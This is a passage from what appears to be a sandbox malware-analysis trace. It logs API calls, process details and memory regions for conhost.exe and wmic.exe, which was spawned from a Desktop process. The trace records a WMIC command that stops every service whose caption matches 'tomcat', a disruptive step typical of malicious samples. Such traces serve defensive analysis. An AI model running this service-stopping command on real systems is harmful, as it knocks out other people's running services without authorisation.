(_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0110.350] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0110.351] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4b7f468*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4b7f4b4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE", lpProcessInformation=0x4b7f4b4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xdf8, dwThreadId=0xdfc)) returned 1 [0110.359] CloseHandle (hObject=0xa4) returned 1 [0110.359] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0110.359] GetEnvironmentStringsW () returned 0x4bc9f40* [0110.359] FreeEnvironmentStringsA (penv="=") returned 1 [0110.359] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0111.157] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4b7f44c | out: lpExitCode=0x4b7f44c*=0x0) returned 1 [0111.158] CloseHandle (hObject=0xa8) returned 1 [0111.158] _vsnwprintf (in: _Buffer=0x4b7f534, _BufferCount=0x13, _Format="%08X", _ArgList=0x4b7f454 | out: _Buffer="00000000") returned 8 [0111.158] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0111.158] GetEnvironmentStringsW () returned 0x4bcb430* [0111.158] FreeEnvironmentStringsA (penv="=") returned 1 [0111.158] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0111.158] GetEnvironmentStringsW () returned 0x4bcb430* [0111.158] FreeEnvironmentStringsA (penv="=") returned 1 [0111.158] DeleteProcThreadAttributeList (in: lpAttributeList=0x4b7f4e0 | out: lpAttributeList=0x4b7f4e0) [0111.158] _get_osfhandle (_FileHandle=1) returned 0x3c [0111.158] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0111.159] _get_osfhandle (_FileHandle=1) returned 0x3c [0111.159] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0111.159] _get_osfhandle (_FileHandle=0) returned 0x38 [0111.159] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0111.159] SetConsoleInputExeNameW () returned 0x1 [0111.159] GetConsoleOutputCP () returned 0x1b5 [0111.159] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0111.159] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.159] exit (_Code=0) Thread: id = 207 os_tid = 0xdf4 Process: id = "41" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x438bf000" os_pid = "0xde4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xddc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2683 start_va = 0x7f559000 end_va = 0x7f559fff entry_point = 0x0 region_type = private name = "private_0x000000007f559000" filename = "" Region: id = 2684 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2685 start_va = 0x5981e0000 end_va = 0x5981fffff entry_point = 0x0 region_type = private name = "private_0x00000005981e0000" filename = "" Region: id = 2686 start_va = 0x598200000 end_va = 0x598213fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000598200000" filename = "" Region: id = 2687 start_va = 0x598220000 end_va = 0x59825ffff entry_point = 0x0 region_type = private name = "private_0x0000000598220000" filename = "" Region: id = 2688 start_va = 0x7df5ff700000 end_va = 0x7ff5ff6fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff700000" filename = "" Region: id = 2689 start_va = 0x7ff6c42f0000 end_va = 0x7ff6c4312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c42f0000" filename = "" Region: id = 2690 start_va = 0x7ff6c431d000 end_va = 0x7ff6c431efff entry_point = 0x0 region_type = private name = "private_0x00007ff6c431d000" filename = "" Region: id = 2691 start_va = 0x7ff6c431f000 end_va = 0x7ff6c431ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c431f000" filename = "" Region: id = 2692 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2693 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2694 start_va = 0x598270000 end_va = 0x59836ffff entry_point = 0x0 region_type = private name = "private_0x0000000598270000" filename = "" Region: id = 2695 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2696 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2697 start_va = 0x5981e0000 end_va = 0x5981effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000005981e0000" filename = "" Region: id = 2698 start_va = 0x5981f0000 end_va = 0x5981f6fff entry_point = 0x0 region_type = private name = "private_0x00000005981f0000" filename = "" Region: id = 2699 start_va = 0x598260000 end_va = 0x598260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000598260000" filename = "" Region: id = 2700 start_va = 0x598370000 end_va = 0x59842dfff entry_point = 0x598370000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2701 start_va = 0x598430000 end_va = 0x59846ffff entry_point = 0x0 region_type = private name = "private_0x0000000598430000" filename = "" Region: id = 2702 start_va = 0x598470000 end_va = 0x598476fff entry_point = 0x0 region_type = private name = "private_0x0000000598470000" filename = "" Region: id = 2703 start_va = 0x598480000 end_va = 0x598607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000598480000" filename = "" Region: id = 2704 start_va = 0x598610000 end_va = 0x598610fff entry_point = 0x0 region_type = private name = "private_0x0000000598610000" filename = "" Region: id = 2705 start_va = 0x598620000 end_va = 0x59862ffff entry_point = 0x0 region_type = private name = "private_0x0000000598620000" filename = "" Region: id = 2706 start_va = 0x598630000 end_va = 0x5987b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000598630000" filename = "" Region: id = 2707 start_va = 0x5987c0000 end_va = 0x599bbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000005987c0000" filename = "" Region: id = 2708 start_va = 0x599bc0000 end_va = 0x599bc0fff entry_point = 0x0 region_type = private name = "private_0x0000000599bc0000" filename = "" Region: id = 2709 start_va = 0x7ff6c41f0000 end_va = 0x7ff6c42effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c41f0000" filename = "" Region: id = 2710 start_va = 0x7ff6c431b000 end_va = 0x7ff6c431cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c431b000" filename = "" Region: id = 2711 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2712 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2713 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2714 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2715 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2716 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2717 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2718 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2719 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2720 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2721 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2722 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 204 os_tid = 0xde8 Thread: id = 205 os_tid = 0xdec Thread: id = 206 os_tid = 0xdf0 Process: id = "42" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1c13d000" os_pid = "0xdf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0xddc" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%tomcat%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2736 start_va = 0xca0000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 2737 start_va = 0xcc0000 end_va = 0xcc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 2738 start_va = 0xcd0000 end_va = 0xce3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 2739 start_va = 0xcf0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 2740 start_va = 0xd30000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 2741 start_va = 0xd70000 end_va = 0xd73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d70000" filename = "" Region: id = 2742 start_va = 0xd80000 end_va = 0xd80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d80000" filename = "" Region: id = 2743 start_va = 0xd90000 end_va = 0xd91fff entry_point = 0x0 region_type = private name = "private_0x0000000000d90000" filename = "" Region: id = 2744 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 2745 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 2746 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2747 start_va = 0x7f570000 end_va = 0x7f592fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f570000" filename = "" Region: id = 2748 start_va = 0x7f594000 end_va = 0x7f594fff entry_point = 0x0 region_type = private name = "private_0x000000007f594000" filename = "" Region: id = 2749 start_va = 0x7f59a000 end_va = 0x7f59afff entry_point = 0x0 region_type = private name = "private_0x000000007f59a000" filename = "" Region: id = 2750 start_va = 0x7f59d000 end_va = 0x7f59ffff entry_point = 0x0 region_type = private name = "private_0x000000007f59d000" filename = "" Region: id = 2751 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2752 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2753 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 2754 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2755 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 2756 start_va = 0xf50000 end_va = 0xf5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 2757 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2758 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2759 start_va = 0x1090000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 2760 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2761 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 2762 start_va = 0xcb0000 end_va = 0xcb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2763 start_va = 0xda0000 end_va = 0xe5dfff entry_point = 0xda0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2764 start_va = 0xe60000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 2765 start_va = 0xea0000 end_va = 0xedffff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 2766 start_va = 0x1070000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001070000" filename = "" Region: id = 2767 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2768 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2769 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2770 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2771 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2772 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2773 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2774 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2775 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2776 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2777 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2778 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2779 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2780 start_va = 0x7f470000 end_va = 0x7f56ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f470000" filename = "" Region: id = 2781 start_va = 0x7f597000 end_va = 0x7f599fff entry_point = 0x0 region_type = private name = "private_0x000000007f597000" filename = "" Region: id = 2782 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2783 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cc0000" filename = "" Region: id = 2784 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2785 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ee0000" filename = "" Region: id = 2786 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2787 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2788 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2789 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2790 start_va = 0x5370000 end_va = 0x56a6fff entry_point = 0x5370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2791 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2792 start_va = 0xf60000 end_va = 0x1048fff entry_point = 0xf60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2793 start_va = 0xef0000 end_va = 0xef3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 2794 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2795 start_va = 0x1190000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2796 start_va = 0x56b0000 end_va = 0x57fffff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 2797 start_va = 0x5800000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 2798 start_va = 0x1190000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2799 start_va = 0x12d0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 2800 start_va = 0x1190000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 2801 start_va = 0x12c0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 2802 start_va = 0xf60000 end_va = 0x103efff entry_point = 0xf60000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2803 start_va = 0x5960000 end_va = 0x5d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000005960000" filename = "" Region: id = 2804 start_va = 0xf00000 end_va = 0xf00fff entry_point = 0xf00000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2805 start_va = 0xf10000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 2806 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 2807 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2808 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 2809 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2810 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2811 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2812 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 2813 start_va = 0x1040000 end_va = 0x1069fff entry_point = 0x1040000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2814 start_va = 0x5d60000 end_va = 0x5ee7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d60000" filename = "" Region: id = 2815 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2816 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2817 start_va = 0xf30000 end_va = 0xf3ffff entry_point = 0xf30000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 2818 start_va = 0x5ef0000 end_va = 0x6070fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ef0000" filename = "" Region: id = 2819 start_va = 0x6080000 end_va = 0x747ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006080000" filename = "" Region: id = 2820 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 2821 start_va = 0x1040000 end_va = 0x1040fff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 2822 start_va = 0x741c0000 